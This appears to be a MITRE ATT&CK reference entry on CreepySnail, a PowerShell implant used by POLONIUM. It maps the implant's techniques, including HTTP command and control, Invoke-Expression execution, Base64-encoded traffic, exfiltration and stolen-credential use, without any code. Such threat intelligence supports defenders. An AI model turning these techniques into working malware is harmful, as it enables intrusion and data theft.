CreepySnail

CreepySnail is a custom PowerShell implant that has been used by POLONIUM since at least 2022.[1]

ID: S1024
Type: MALWARE
Platforms: Windows
Version: 1.0
Created: 08 July 2022
Last Modified: 08 August 2022

Techniques Used

Domain ID Name Use
Enterprise T1071 .001 Application Layer Protocol: Web Protocols

CreepySnail can use HTTP for C2.[1]

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

CreepySnail can use PowerShell for execution, including the cmdlets Invoke-WebRequst and Invoke-Expression.[1]

Enterprise T1132 .001 Data Encoding: Standard Encoding

CreepySnail can use Base64 to encode its C2 traffic.[1]

Enterprise T1041 Exfiltration Over C2 Channel

CreepySnail can connect to C2 for data exfiltration.[1]

Enterprise T1016 System Network Configuration Discovery

CreepySnail can use getmac and Get-NetIPAddress to enumerate network settings.[1]

Enterprise T1033 System Owner/User Discovery

CreepySnail can execute getUsername on compromised systems.[1]

Enterprise T1078 .002 Valid Accounts: Domain Accounts

CreepySnail can use stolen credentials to authenticate on target networks.[1]

Groups That Use This Software

ID Name References
G1005 POLONIUM

[1]

References